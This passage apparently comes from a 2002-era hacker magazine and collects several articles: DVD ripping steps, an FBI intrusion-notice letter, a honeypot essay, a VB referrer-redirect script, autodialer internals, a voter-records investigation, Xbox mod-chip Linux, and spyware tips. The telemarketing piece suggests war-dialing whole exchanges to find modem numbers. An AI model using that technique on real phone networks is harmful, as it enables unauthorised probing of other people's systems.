7: (From now on, all unlettered steps refer to VCD and SVCD only, since AVI users should have stopped reading this already.) Now we have a *.d2v and a *.wav file. We need to merge these into a single MPG file. Fire up TMpgEnc. Once again, take a look at what it can do before trying to rip - this program in particular is very useful. I highly recommend playing with the "MPEG Tools" under the file menu. Now that you are ready to go, check out the bottom of the main TMpgEnc screen. You have three boxes there: "Video Source", "Audio Source", and "Output File Name". For video source, we want the *.d2v file we just created, and for audio we want the *.wav file. (Side note: listen to the wave before finishing this step. If it's not the audio track you want, go back to the DVD2AVI step and select a different audio stream from the audio menu until you get the one you want.) For the output file name, select where you want the MPG file to be saved. Now we need to set up the encoder. Click the "Load" button next to the output file name box, and navigate to the "TMpgEnc\Template" folder. From here we have the choice of loading a number of templates, but we're interested in only four: VideoCD (NTSC), VideoCD (NTSCFilm), SuperVideoCD (NTSC), and SuperVideoCD (NTSCFilm).

8(V): VCD users check where you wrote down the "Video Type" from the end of step 6. If it was higher than 90 percent Film, load the "VideoCD (NTSCFilm)" template.
If the video type was anything else, just load "VideoCD (NTSC)". Now click setting. Leave everything alone except for this setting: Under advanced, change the "Source Aspect Ratio" to what you wrote down from "Aspect Ratio" at the end of step 6. Now click OK to go back to the main window. You're ready to convert to MPG. Click "Start" in the top left corner and then get some sleep. It takes up to three hours on a 2ghz Athlon machine, probably much much longer for most of you.

8(S): Video CD users, use the instructions from step 8(V) - just load the SuperVideoCD templates.

9: Boy, that took a while. Now we have an mpg file of the complete movie. Check it for quality, audio synch, and general not-being-screwed-up. When you're satisfied that the file is complete, it is safe to delete all the other files that you used for this project. Now the file should be roughly a gig for a normal length movie. We need to split it up. Stay in TMpgEnc. Remember when I mentioned the cool MPEG Tools? We're going to use one of them now. Go to file->MpegTools. Click the "Simple De-Multiplex" tab. Load the mpg file of the movie into the "Input" file box, and the other two should be automatically filled in for you. Click the start button. It will rip the MPG file into a *.m1v and a *.mp2 file. These we need to load into BBMpeg. Go to the BBMpeg folder and run "AVI2MPG2". It looks very confusing when it loads, but don't fret. Take a look around again. What we need to do is simply click the "Start Encoding" button, ignoring the very confusing initial interface. Click the Settings button. We need to set something on three out of the four tabs you now have access to. On the "General Settings" tab, set the "Max Size(MB)" to a number equal to roughly half the filesize of the file you have, but don't go higher than 10MB less than the size of your CD you will burn it to. I like to keep mine set to 640MB, it seems like a pretty standard size.
On the "Input and Output Files" tab, we need to set three things. The "Program Stream File" is the name of the output file you want. Your half-movies will be called {filename}01.mpg and {filename}02.mpg. Now for the "Video Stream File" and "Audio Stream File", use the *.m1v and *.mp2 files we just created, respectively. The last tab is the "Program Stream Settings". Simply choose "VCD" or "SVCD" from the radio buttons. The fourth tab allows you to save your settings for this program. Do so if you are going to be using it a lot. Click OK to get back to the "Start Encoding" screen, then click "Start". This shouldn't take very long.

10: Now we have two (or sometimes three) files that are small enough to fit on CDs. Load up Nero. In the "Create CD" dialog, Nero should have options for both VCD and SVCD. Select whichever applies. Under the ISO tab, select "ISO Level 2" for the filename length, and "ISO 9660" as the character set. Also check all the boxes under "Relax ISO Restrictions". Now we are ready to burn. Click "New" and it will take you to a normal CD creation screen, except the CD window has both a directory structure and a file list box in it. Drag your file to the white box under the directory tree, not into the tree itself even if you know where it goes. Nero will check the file. If it complains, just ignore it. It should still work. Now burn... and you will have yourself a fresh VCD or SVCD. Repeat this step for the rest of the disks needed to get the full movie.

11(V): Playing VCDs on computers: You can use a software VCD player, or just go into the CD and open "AVSEQ01.dat" in the "MPEGAV" folder with your favorite media player.

11(S): Playing SVCDs needs a compatible DVD software player or an MPEG2 codec for your Media Player. Personally, I use ATI's media center, or PowerDVD.

12: Enjoy!

Props to KalLI - I learned how to rip DVDs using his site.
Also, check out afterdawn.com - there are some good things on there. I would also like to ask Wilson to read this article aloud to the class like he always does. Thanks.

Links

http://www.afterdawn.com/software/video_software/dvd_rippers/smartripper.cfm
http://www.afterdawn.com/software/video_software/dvd_rippers/dvd2avi.cfm
http://www.afterdawn.com/software/video_software/video_tools/tmpgenc.cfm
http://members.cox.net/beyeler/bbmpeg.html
http://www.adaptec.com/worldwide/support/driverdetail.html?cat=/Product/ASPI-4.70&filekey=aspi_v470.exe

U.S. Department of Justice
Federal Bureau of Investigation
In Reply, Please Refer to File No.

The NASA Office of Inspector General and the FBI are conducting a joint investigation into unauthorized computer intrusions that have affected both the government and private industry. During the course of this investigation, we discovered a log file listing Internet Protocol addresses and server names. It appears to be a list of computers that were compromised. In order to notify the potential victims of this criminal activity and enable them to check their own systems, we have compared the log of IP addresses and server names against the most recent information available in the WHOIS database. This letter is being sent to you because the IP address or server shown below, and last registered to you, appeared on the log file of apparent victims. We have no indication that the intrusions associated with this activity are continuing. We also are unaware of the hacker's methodology against your system, the potential level of access, or the possible damage to your system.
The time frame of the activity to which the log file relates occurred between December 2001 and March 2002, with the majority of the activity occurring in mid-February 2002. This communication is being provided to you by the Watch and Warning Unit of the National Infrastructure Protection Center (NIPC), located at FBI Headquarters in Washington, D.C. In addition to the recommendation that you check your log files for indications of unlawful activity and take appropriate mitigation action, NASA and the FBI request that you provide any information relating to this matter to the NIPC by e-mailing the Watch at nipc.watch@fbi.gov. For recommendations about examining your systems in a manner that helps preserve the evidentiary value of information you discover, please refer to the NIPC website at www.nipc.gov/incident/incident2.htm.

System(s) Information

The kicker of this is that both the contact and domains referenced had nothing to do with us and we were apparently sent this letter in error. Yet more wasted time and resources. (The Watch and Warning Unit?!)

by Bland Inquisitor
bland_inquisitor@hotmail.com

Honeypots are usually programs that emulate services on a designated port, but once successfully cracked, offer no real power to the attacker. The honeypot program will then alert the admin that an attack is in progress, and will allow the admin to track the attacker's every move. Honeypots will also show the methods the attacker is using to gain entry, and what methods are being used to cover his or her tracks. In this article, I will show how honeypots work, why honeypots are not generally practical for most security situations, and how honeypots are breeding both smarter attackers and dumber admins.

How Honeypots Work

Honeypots are designed to operate on many levels. They increase the time an attacker will spend because the honeypot makes it unclear which attacks work and which ones don't. They let the admin know what method an attacker is using before they succeed - such as port scanning, brute forcing a password, or a Sendmail attack. Once honeypots are widely implemented, the attacker will be forced to spend more time in a system that may be closely watched, and will eventually be scared off. Also, once xy63r ninja the script kiddie stops going anywhere near the system, admins can focus all their attention on fending off people with actual skill.

In one of the honeypot advertisements I read, port 365 was being used as the honeypot port. This means that a scan that returns port 365 as active will make the would-be attacker turn and run off, and that systems that are not running the honeypot can use port 365 as a bluff, so that when xy63r ninja the script kiddie sees it and the system looks sexy, he will be less inclined to go in because he thinks that the vulnerabilities he sees are a deception. According to SecTech systems administrator Dan Adams, honeypots are "like opening a fake store, loading it with cool stuff, and sitting back hoping someone will break into it."

Honeypots are catching a lot of pretty serious heat from the legal and ethical community. Some critics are calling honeypots entrapment. Let me clear this up for you. Entrapment occurs when a person is coerced to commit a crime that they would not under normal circumstances engage in. It's going to be next to impossible for poor xy63r ninja to use an entrapment defense in court, because by the time po po shows up, it will be obvious he was lame-assing around of his own accord. However, if a crafty admin goes on IRC and tells everyone that his honeypot is actually the fabled government computer that holds the truth about the Kennedy assassination, Area 51, and ancient methods of dolphin flogging and people hack him, then an entrapment defense would stand a chance. The reason is that the admin could never prove that xy63r ninja and his crew were going to hack his system without being enticed.

Other critics say that honeypots are akin to electronic wiretapping. This I can agree with. Since there is not much legal regulation of honeypot technology, and the closest legal procedures are loose at best, some very scary things could happen. Other companies could expand the basic thrust of the technology, perhaps into the p2p networks. At that point it would be us, the hacker community, that stands up and tells the world that this is a gross invasion of privacy. Then, pretty much just like the MPAA did to us, all they would conceivably have to say is: "Consider the source, your honor. Hackers want this technology stopped. Hackers are criminals. You don't want to side with criminals, do you? We are here to protect the American people from hackers, and we need you to be brave and give us the power to shut these nasty people down." Then in all likelihood, the corporations would roll right over us again. I don't think it takes a major leap of logic to see that this is where honeypot technology, or more specifically, technology that clearly violates people's rights under the guise of protection, could be headed. Also, I don't trust the "good guys" any farther than I can throw them. We need to put a handle on the situation before the "security community" gets any ideas on how to further expand their powers past our rights on the backs of the hacker community they demonize to get their way.

Why Honeypots Are Not Practical For Everyone

The good news is that honeypots are not a true "solution." The best application for a honeypot is to track an intruder who has already made a home in the system. The most noteworthy case of this happening was documented by Clifford Stoll in his book The Cuckoo's Egg.
Stoll was an admin at Berkeley when he found an intruder using his system to steal secrets. But only an admin who has been around the block a few times and watches his system often can make full use of honeypots. Apart from that, over 90 percent of attacks against a system come from inside, and there is nothing a honeypot can do to stop someone who has internal access from running amok. For the average company, the extent of a honeypot's effectiveness is to keep xy63r ninja and the rest of the script kiddies away, and to show that there is a real threat of people breaking into the system. It is almost unheard of that a honeypot traps someone with real skill because it is designed to keep the kiddies at bay.

In the digital arms race, tightening the existing security holes will only force the attackers to get better while the admins get complacent. Most admins are only slightly better than good ole xy63r ninja in the first place - they get the latest and greatest piece of ready-made software and call themselves experts. What is bound to happen in the majority of the situations is that a company sets up a honeypot and never bothers to spend the time it takes to maximize its effectiveness. Of course, the true answer is for admins and software programmers to actually take a little pride in their work and do their jobs properly. Also, it would help if software companies would take some responsibility when they find security holes in their product and update accordingly. System admins should also feel obligated to keep their software current, and make sure nobody within their company is given more access than they need.

Shout outs: stankdawg, grifter, debug, project honeynet. And an apology if anybody actually uses the name xy63r ninja.

Redirection Stopped

by c0ld_b00t

The letter from "bradsnef" in 19:3 about how Ford could redirect back to 2600.com or 127.0.0.1 etc. got me thinking about how easy that could be. It turned out to be easier than I thought.
Every http request has a host field in it that contains the address that was typed in, so if I type in "www.2600.com" and click "Go" it will have www.2600.com in the host field. All browsers that I know of send the host field in their http request. If DNS redirects a site, the host field will not change when redirected and so we can detect it with little effort.

Example of an HTTP request (notice the host field):

    GET / HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    Host: www.2600.com
    Connection: Keep-Alive
    <crlf><crlf>

Included is a small VB program (I used VB to show how easy it is) that scans all incoming http requests and checks to see if the host field is the web address or the IP address of the current website. If not, it redirects to 2600.com, and if so it redirects to Ford's website.

This doesn't protect from meta tag redirection, or (I)FRAME redirection which needs a webpage to do the redirecting, rather than a DNS entry. Here is a script that can stop that (real simple - it took five minutes). Hey, a 16 year old can do it, so can a big corp.

    <html>
    <head>
    <script>
    // the third "/"-separated piece of the referrer URL is its host name
    splitit = document.referrer.split("/");
    if (splitit[2] == "www.fuckgeneralmotors.com") {
        document.write("<html><head><meta http-equiv='REFRESH' content='1;URL=http://www.2600.com'></head></html>");
    } else {
        document.write("<html><head><meta http-equiv='REFRESH' content='1;URL=http://www.ford.com'></head></html>");
    }
    </script>
    </head>
    </html>

OK, here is the DNS Redirection filter made in VB. Note: If you are going to set this filter up you'll have to change your server port to something other than 80 and change the meta headers to redirect to that port (big deal, unless you're running IIS). You could add this feature to an open source web server, too. You could alter the code to redirect to the port directly.
Step 1. Create a project with "Standard EXE".
Step 2. Add a Winsock component and name it Winsock1 (that's the default).
Step 3. Change the properties of Winsock1's Index tab to 0.
Step 4. Make a form and name it Form1 (default again).
Step 5. Put the code below in the form.

    'DNS Redirection filter
    'by c0ld_b00t
    'for Fored(lol) and NPR
    Private webaddress As String
    Private webip As String
    Private intlastcontrol As Long

    Private Sub Form_Load()
        'remember our own host name and IP, then listen on port 80
        webaddress = LCase(Winsock1(0).LocalHostName)
        webip = Winsock1(0).LocalIP
        intlastcontrol = 0
        With Winsock1(0)
            .LocalPort = 80
            .Listen
        End With
    End Sub

    Private Sub Winsock1_ConnectionRequest(Index As Integer, ByVal requestid As Long)
        If Index = 0 Then
            'load a new control array member for each incoming connection
            intlastcontrol = intlastcontrol + 1
            Load Winsock1(intlastcontrol)
            Winsock1(intlastcontrol).LocalPort = 0
            Winsock1(intlastcontrol).Accept requestid
        End If
    End Sub

    Private Sub Winsock1_DataArrival(Index As Integer, ByVal bytesTotal As Long)
        Dim data1 As String
        'use the socket that raised the event (Index), not the most recently loaded one
        Winsock1(Index).GetData data1
        On Error GoTo redirectnormal
        'pull out the text between "Host: " and the end of that line
        a1 = InStr(1, data1, "Host: ") + 6
        a2 = InStr(a1, data1, vbCrLf)
        a3 = LCase(Mid(data1, a1, a2 - a1))
        If a3 = webaddress Or a3 = webip Then
            GoTo redirectnormal
        Else
            'DNS redirection detected, redirecting back to 2600.com
            Winsock1(Index).SendData "<html><head><meta http-equiv=" + Chr(34) + "REFRESH" + Chr(34) + " content=" + Chr(34) + "1;URL=http://www.2600.com" + Chr(34) + "></head></html>" 'meta tags here
        End If
        Exit Sub
    'here we do a normal redirection to ford.com
    redirectnormal:
        Winsock1(Index).SendData "<html><head><meta http-equiv=" + Chr(34) + "REFRESH" + Chr(34) + " content=" + Chr(34) + "1;URL=http://www.ford.com:80" + Chr(34) + "></head></html>" 'meta tags here
    End Sub

    Private Sub Winsock1_SendComplete(Index As Integer)
        'close the connection whose send just finished
        Winsock1(Index).Close
    End Sub

Step 6: Compile and run.
Shoutouts: Hi Mom, Bryan, Cassidy, my bro (Nathaniel), and whoever I forgot.

More on Telemarketing

by D. Foetus

In response to the number of letters received regarding the TeleZapper and similar systems that will "zap" your phone number from a telemarketing system's database, here is some more insight.

Many larger telemarketing, market research, and bill collection companies use autodialers coupled with CATI (Computer Aided Telephone Interviewing) software systems. It is the job of the autodialer to dial, say, ten phone numbers for every human agent that is currently seated in their calling center, knowing that one out of every ten phone calls will be answered. The number of calls made by the autodialer can be, and usually is, automatically adjusted depending on how that 10:1 ratio performs. For example, if the sample being dialed consists of phone numbers culled from product registration cards, the number of answered calls may be higher than if the machine is running RDD (Random Digit Dialing) in valid area codes and exchanges, minus already known phone numbers - basically war dialing for unlisted phone numbers.

If you ever get a phone call that shows up on your Caller ID as being from, say, XYZ Research, and it hangs up immediately after you answer, you've received a "nuisance call." This happens when the autodialer has made more calls than there are available humans to patch you to. Your phone number is now flagged and will receive special treatment - the system knows you are home and answering the phone, but it also knows it just hung up on you. You will now get another call from XYZ Research in about 15 minutes (the amount of time lapsed is set by the user system-wide), but this time their system will reserve a human before calling you, ensuring that they get to talk to you.
The autodialing system will eventually have dialed through the entire pool of sample, and it will have pretty much determined which phone numbers are good and which are not. It can distinguish between non-working numbers (those that answer with the familiar tri-tone followed by a recording of some sort), those that do not ring at all, those that are busy, those that are good (no answer, etc.), and those that are fax/modem/machine numbers. Each phone number has a status code assigned to it and any bad numbers are resolved never to be called again.

Aside: Interesting point here is that all the fax/modem/machine numbers will have received a unique status code marking them as such - basically there now exists a pool of phone numbers that have a very high likelihood of being modem numbers. Just as easy would be to set up a project that runs automatically overnight, dialing strictly 202-xxx-xxxx numbers (if you wanted to find machine numbers in the DC area), and have your CATI software just hang up on all good numbers. Look at your "bad: modem number" list in the morning and you've got an excellent start on your fun for the days to come. If one has the desire, and access to a larger system, one could easily burn through tens of thousands of phone numbers in a single night.

But back to the TeleZapper vs. autodialers and other devices. For them to work, your phone must actually go off hook and transmit the tone(s). If an autodialer calls your number and your voice mail picks up, the call is immediately transferred to an available agent, who will mark your phone number as known good, but you're not home (answering machine/voice mail answered). I'm sure you're already ahead of me here, but, the obvious step to take is to record the "bad number" tone(s) as the first part of your outgoing message.
Sure, it will annoy the hell out of your friends and family, but it will kill your phone number in that sample pool if it's being dialed by an intuitive auto-dialer.
Note that I say that sample pool. Your phone number may exist in myriad sample pools at different companies. One way to dramatically cut down on telemarketing calls (and market research calls, if you're so inclined, though they are two very different entities with two very different agendas), is to first register the phone number with the DMA (Direct Marketing Association) as wanting to opt-out of telemarketing calls. Also, explain to any company you do not wish to hear from that you wish for your phone number to be placed on their "do not call" list. The DMA also allows one to register their mailing address as well as email address as opt-outs to cut down on junk mail and, allegedly, spam email. Not all companies check their sample against the DMA's opt-out list, and not all maintain a "do not call" list, but any company that wishes to do business in an above-the-board manner will heed your request. Telemarketing companies can be somewhat sketchier than market research companies - any market research company that wants to stay in business and make money will follow the guidelines for standards and ethics set forth by the MRA (Marketing Research Association), CASRO (Council of American Survey Research Organizations), and other organizations. A client will likely not do business with a market research company that does not belong to these organizations.
It does take a while for your opted-out phone number/address/email address to trickle down and through the gigantic system that is comprised of sample houses (those that provide the phone numbers, street addresses, and e-mail addresses), and to the thousands of end-users (telemarketers and research companies), but it does work. A perfect time to do this is when moving and getting a new phone number, but it will have an eventual effect if you're staying put as well.
Another option is to sign up for your local telco's "security screening" plan, if available. This will require any caller who is blocking their Caller ID info to input their phone number, or the call will not be connected. One drawback is that some long distance companies relay calls around the country to the closest low-traffic switching point and the Caller ID info is stripped in the process, requiring Grandma to input her phone number each time she tries to call you, since she's on a fixed income and using Jimbo's Phone Company to make cheap long distance calls.
No one will ever be totally free from receiving unwanted phone calls, but there are ways to dramatically reduce them. As many ways that there are of keeping our phone numbers in the hands of those we want calling us, there are ways of getting around whatever we put in place to try to ensure this. Surely somewhat ironic to those reading this magazine...

Cracking VOTER Fraud
by Kr@kH3d (DFxC)
(Why the goofy "leet" name? Overkill is funny...)
Some New York 2600 readers may have seen the recent three minute report on WABC's Eyewitness News (10/25/02) on the discovery of suspected fraudulent voters in New Brunswick, NJ. Since I've been a longtime 2600 fan and played a major part in the investigation, I figured I'd outline how we did it.
After speaking with the people at the local Board of Elections and realizing how easy it is to commit voter fraud, I also felt it may be of use to others in general. Oh, and if you saw the report, there's a brief shot of my back while I'm at the computer wearing an H2K shirt!
The technique outlined here was developed by the New Brunswick United (http://www.newbrunswickunited.com) Antifraud Division, headed by attorney Flavio L. Komuves. I was lead investigator in charge of isolating possible cases of voter fraud, and was ably assisted by a number of Rutgers University student interns.
I should preface this with the disclaimer that the resources and procedures I am outlining are legally available in New Jersey, and there is no need to obtain any information illegally. Check with your local authorities for your area. Also, a new law regarding voting was recently signed and certain new provisions will take effect in the 2006 elections. Always take any information you gather to a reputable lawyer and get advice before releasing it publicly - voter fraud is a serious charge and falsely accusing someone (even unintentionally) could probably result in charges against you! Also keep in mind, any information we determined via this method of database searching was later verified by actual field visits to the properties in question.
It's actually rather similar to profiling a system. The first step is to gather all the information possible about your target. Your first stop should be your county Board of Elections. You will have to fill out certain forms - being part of a political organization helps out here, as they reserve the right to ask why you are requesting the information. There are two databases they maintain that you will need to request on CD-ROM: the current Active Voter Registration database ("walking list") and the current Actual Voter Database ("voting history").
There will probably be a fee involved - excessive fees for preparation and other "costs" is yet another way the government restricts your access to information (while insisting on greater access to your information). I believe it should come to approximately $60 for both CD-ROMs and it may take a week or so for them to prepare.
The second stop is your local Municipal Clerk's office. Here you request a listing of all paid city employees ("Municipal Employee List"), specifying the following information: salary, whether or not he or she is a city resident, years of service, job title, and of course name. They must release this information to any city resident as it is considered public information (your tax money pays their salary). Again, they may charge you for costs. In our instance, the City Clerk's office tried throwing us off by refusing to provide us with a CD-ROM version, and instead provided us with a printout of the database. Luckily, volunteers created an Access database and entered the information into it within a day or so. You may also request a listing of all rental properties (and landlord owners) from your city's Rent-Leveling Board or similar body.
OK, so now you have your base documents. You've gathered your information. Now to poke for weaknesses. What next? Well, first look at the Active Voter Registration and sort it by birthday. Any 172 year olds still registered? Probably not. If so, check their names on the Actual Voter Database. In our investigation, we immediately noticed an enormous number of people born on 01/01/1901. According to the Board of Elections this is their standard procedure for dealing with illegible entries and/or people who registered to vote before New Jersey required birth date to be added to the Voter Registration form. Sorry, strike two. Next, run a query to isolate everyone from like age 99 and up. If you feel there's an overabundance,
check the names against the Social Security Death Index on http://www.ancestry.com. Don't get too excited if you find matches though - Americans have the funny habit of naming their kids after themselves. Go to http://www.netronline.com/public_records.htm (Property Tax Records) and make sure it isn't their son or grandson (in one instance we originally thought for sure was voter fraud, there was a son named after his father, who inherited the house his parents had lived in, and then married a woman with the same first name as his mother - creepy!). Be thorough, but don't waste too much time on this - we had a team spend over a month on this and turn up only a handful of "possibles." It might also be helpful to have someone working with you who has access to credit card histories/databases, but I'm not sure if that is legal or how useful it would be in this instance.
That takes care of the infamous "dead vote." The next "weakness" to probe is the Municipal Employee List. Hopefully, you know your town pretty well, because how effective your work here will be will be in direct proportion to how well you know your town. The first test is to query all non-city resident employees and run their names on both the Active Voter Registration and Actual Voter databases. Note down any instances, but keep in mind that the individual may have lived in your town at one time, and showing up on the Active Registration Database isn't a crime in and of itself - voting (i.e., being on the Actual Voter Database) is. Follow this up by running a query with all employees making over, say, $65,000 a year. Run their names on both the voter databases and pay attention to what their registration address is. You may discover some rather well-off individuals living in really shady neighborhoods.
In our investigation, we caught the city's Chief of Operations for Urban Renewal voting out of the same run-down apartment in an impoverished high-crime area as a small immigrant family. On investigation of the Property Tax Records, we discovered he lived in a nice home a few towns away! Most of our results came from this method.
If you managed to get a copy of the landlord listings, be sure to check all those names thoroughly as well. A common form of voter fraud is for landlords to register at a property they are renting out. A good portion of our leads were also generated this way by checking landlords we knew had broken the rent-control laws.
The last method we used that had results was to start running names of business owners who operated in town. Much like the landlords, some unscrupulous business owners will register to vote at their place of business.
Well, that's basically it in a nutshell. Hopefully, this short article was informative and useful, as well as a contribution showing that 2600 readers are often more concerned about protecting and maintaining the democratic process than the politicians who scapegoat us as evil hackers. For questions or comments, email dominick@ramiustech.com with "2600" in the subject line.

by Live_wire
Requirements:
A mod-chip.
Ed's xbox linux (Debian derivative) found at: http://sourceforge.net/project/showfiles.php?group_id=54192.
BIOS for mod-chip that allows Xbox to run unsigned code.
EvolutionX dashboard.
As some might have noticed, there have been several strides made in the attempt to put Linux on any device in which it would be logically beneficial to the computer/hacker community, or just for the challenge of it. The Xbox is no exception. It is now possible to put a full Linux distribution on the Xbox console, due to the work of some very diligent Linux/Xbox hackers. I will cover the steps to go about installing Linux on your Xbox console and the significance of such an installation.
There are multiple reasons one might want to go about installing Linux on an Xbox. For one, it would serve as a very inexpensive desktop computer. Being that you can now find Xboxes selling at prices of $170-$200, this is understandably worthwhile. The Xbox is also feature-rich. It is a gaming console, DVD player, and now with the inclusion of Linux, can be your desktop computer, DivX player, and web/ftp server. Perhaps you would use it just to run nominal functions, saving your main computer the stress. This is just the beginning, though. The possibilities are, obviously, limitless.
This brings us to the actual installation. You will need a modified Xbox to consider such a setup. However, this is not as scary as it may sound to those who might not have soldering experience. Gone are the days in which you would have to solder 29 wires to the Xbox motherboard. You can now buy wireless mod-chips which require no soldering at all. There is a chip out now called the Matrix (by Xodus) that is wire free and can be installed in a matter of minutes. There are also other chips in development that will be wireless also, so then it would be just a matter of personal preference as to which you would choose. I have chosen to go with the Matrix chip because it has no wires to solder, comes with a programmer, and, as far as I have seen, is the easiest to install. I must mention also, if you don't want to fork out $60, you can make your own. CheapLPC, designed by Andy Green, can be constructed for a few bucks. Visit http://warmcat.com/milksop/index.html.
So this is where we start. You have your mod-chip of choice. You also downloaded the .iso image of the Xbox Linux distribution located at the sourceforge site mentioned at the beginning of the article.
You will need to flash your mod chip with a BIOS that will support running unsigned code on the Xbox. These BIOSes can be readily found on the Internet with a little due diligence. I mentioned that the Matrix mod-chip comes with a programmer. You can plug that programmer into the parallel port on your computer and flash the Matrix with BIOS software that way. You can get the flashing software from http://warmcat.com/milksop/index.html (Xodus will release their own GNU software shortly). I have chosen to go with the EvolutionX 2.5 BIOS because it supports all the features one would want, such as running unsigned code, among others. Next, you will have to download the EvolutionX dashboard, which will replace the original Xbox dashboard and will act as your new interface with the Xbox, and burn it to a CD-RW (Xboxes do not like CD-Rs). This can also be found on the net with a little patience.
You will then need to open your Xbox and physically install the mod-chip. After that, you will want to install the EvolutionX dashboard that you downloaded and burned to CD. You will now have a pretty new interface that has many features, such as backing up games (that you bought) and whatnot. Once this is installed, you will then be able to install your downloaded Linux distro.
You might be thinking, how do I work with Linux when all I have is an Xbox controller? Well, as you might know, the controller ports on the Xbox console are really just usb ports, with a little modification. You can get ahold of an Xbox controller extension, cut it in half leaving the end that plugs into the Xbox intact, and look at the wires. You will see a red, green, blue, white, and yellow wire, the same as a standard usb cable minus the yellow one. You can then cut a usb cable, leaving the usb A end intact which connects to your usb keyboard/mouse. Solder the matching wires together and leave the yellow Xbox wire by itself. Do this two times and you now have a keyboard and mouse that you can plug into the Xbox and use with Linux, assuming Linux supports the ones you chose (make sure it does).
There you have it. A Linux/Xbox that can now be used as you wish it to be, and the best part about it is that it is legal. The developers that have been working hard on this Linux project are not building this software on top of the Microsoft kernel - they are using the Linux kernel. They are also not using non-licensed software like the XDK, which is Microsoft's development kit for the Xbox. The reverse engineering that has been done has been done under Section 1201(f) Reverse Engineering Exception for interoperability of the DMCA.
I am indebted to the Linux developers of xbox-linux.sourceforge.net, the Xodus team, Xboxhacker.net (and its forum), Andy Green, and several other sites/individuals/hackers that have made this article possible. I will cover the more technical aspects of Xbox hacking in a future article, but I hope I have given enough information so that you might get a start with hacking Linux onto the Xbox, and learn in the process.

by 0A/3_ 3>3d_MU/VsLV
haxor2600@mailcity.com
This short article is far too small to encompass this topic but hopefully it will focus more attention on the increasing problems of removing spyware and adware. Any hacker running a Windows operating system is going to come across some spyware or adware at some point. Popular file sharing P2P software is typically one of the most common areas where adware is installed. An example of this would be Kazaa P2P, which by default installs cydoor (cydoor.com).
Spyware and adware are often hidden deep in the Software Licensing documents and Terms And Conditions when you install the software. This can result in such things as your day-to-day activities being broadcast to strangers or annoying ads being projected in your face every few minutes.
To make it more confusing, adware isn't necessarily spyware. Registered shareware without ads may be spyware, and purchased out-of-the-box software may contain adware and may also be spyware. In addition, software updates may change a previously ad-free version into an adware product. All this means that users need to be on guard when installing any type of software.
While legitimate adware companies will disclose the nature of data that is collected and transmitted in their privacy statement, there is almost no way for the user to actually control what data is being sent. The fact is that the technology is in theory capable of sending much more than just banner statistics - and this is why people (especially computer hackers) should feel uncomfortable with the idea.
To top it off, if you have a slow computer or Internet connection the resource hogging adware or spyware can cause system and browser instability and slowness, as well as slow Internet connectivity even more.
How Do You Protect Yourself?
1. Read the terms and conditions of the license carefully before pressing "accept."
2. Run a spyware or adware removal software tool. There are many free versions available.
3. Avoid spyware at all costs. Run a firewall utility like Zone Alarm (zonelabs.com) that specifies which programs can access the Internet and how. Pay attention to what is asking for permission to connect online.
4. Hack a way to circumvent the spyware or adware software and most importantly post these to a hacker message board or to a hacking website.
5. Avoid adware. If you're broke and can't buy a clean shareware product, find an ad-free, non-spying equivalent of the program you need.
This can be hard since many popular programs come only with adware installed.
6. Learn to use a packet sniffer to identify transmissions that sneak through your browser and other trusted apps.
7. Get to know your registry really well, especially the HKEY_LOCAL_MACHINE\SOFTWARE, HKEY_CURRENT_USER\Software, and for Win2k HKEY_USERS\ areas. If you notice software installed that you are suspicious of, check to make sure it's not spyware or adware.
8. Manage your startup programs carefully. Check the registry or use "msconfig" or a similar startup manager or alternatively download and install a free task manager to check and kill running spyware/adware.
9. And finally, you can also reverse engineer the adware software and find a way to corrupt the data being transmitted. Alternatively develop your own program to transmit dummy data to the adware/spyware host servers. If you do achieve this, post the results to a hacker message board or to a hacking website.
Some good ad removal programs are: Opt-out (grc.com/optout.htm) and Ad-Aware (lavasoftusa.com). Also, visit the following websites: scumware.com, security.kolla.de, and spywareinfo.com.
In summary, spyware and adware are not illegal types of software in any way. However there is almost no way for the user to actually control what data is being sent. My guess is that a delivery system like the ones used by spyware and adware corporations would be the most efficient way for governments to spy on the public. They probably have already thought of using this system so hackers beware.
Shouts to VISA_burglar, Greg_Ipp, Jalaludin_Rumi, _SfR_BU_D_, Scrappy.

[Image: Sprint bill, page 1, summary of charges.]
Here's our August Sprint bill - a little higher than usual, but otherwise normal.
[Image: credit card statement listing two SPRINT transactions.]
Well, here's a neat trick. They charged us twice! And from two different states. This is what we get for trusting them to do an automated credit card payment each month.
[Image: Sprint bill, page 1, statement date 9/24/02, summary of charges.]
At least they caught their mistake and have given us a negative balance. But why would they be submitting another charge to our credit card?
They charged us again! Even though we have a negative balance! It's either incompetence or cunning.
Again, we still have the same negative balance. Apparently, Sprint's policy is to credit any negative balances on paper but not in reality. They get to hold onto our money and at the same time claim we have a credit with them. When we finally called them on it, they asked if we would like to have it "applied" to our account. As if there was a SINGLE advantage to keeping it stuck here!
[Image: Sprint bill, billing period ending 10/23/02, statement date 10/24/02, summary of charges.]
[Image: credit card statement listing a 09/27 SPRINT USAGE charge.]

EXPOSING the Coinstar Network
by area_51
Located across the United States, and now in parts of the United Kingdom and Canada, Coinstar machines are situated in supermarkets everywhere. Large and green (in the US - blue in foreign markets), the machines accept unrolled, unsorted change and spit out a voucher redeemable for cash for a processing fee. While the concept is simple, Coinstar has more to it than meets the eye. As a previous investor in the company and a frequent user of their machines, I have learned a great deal about how they work.
The machine itself consists of a CRT monitor, receipt printer, two large plastic bins which hold change, a mechanism for sorting change, a modem, and (surprisingly) a telephone. The machine is controlled by four large buttons, one green, one red, and two gray (newer machines have slightly different configurations). The user presses the green button several times to enter into the coin processing mode, at which point they dump their change into a metal tray. The change falls through a small slot, where it drops down into the sorting mechanism. If too much change is dropping into the sorting mechanism, the slot closes temporarily to allow the sorting mechanism to catch up.
The sorting mechanism itself does not involve the size or the weight of the coin, as this is too slow a process and causes too many errors in the identification of coins. Rather a complicated process involving electromagnetic identification is used. Coinstar currently holds U.S. Patent Number 6,196,371 for the device and the abstract of the patent provides a good explanation of how it works:
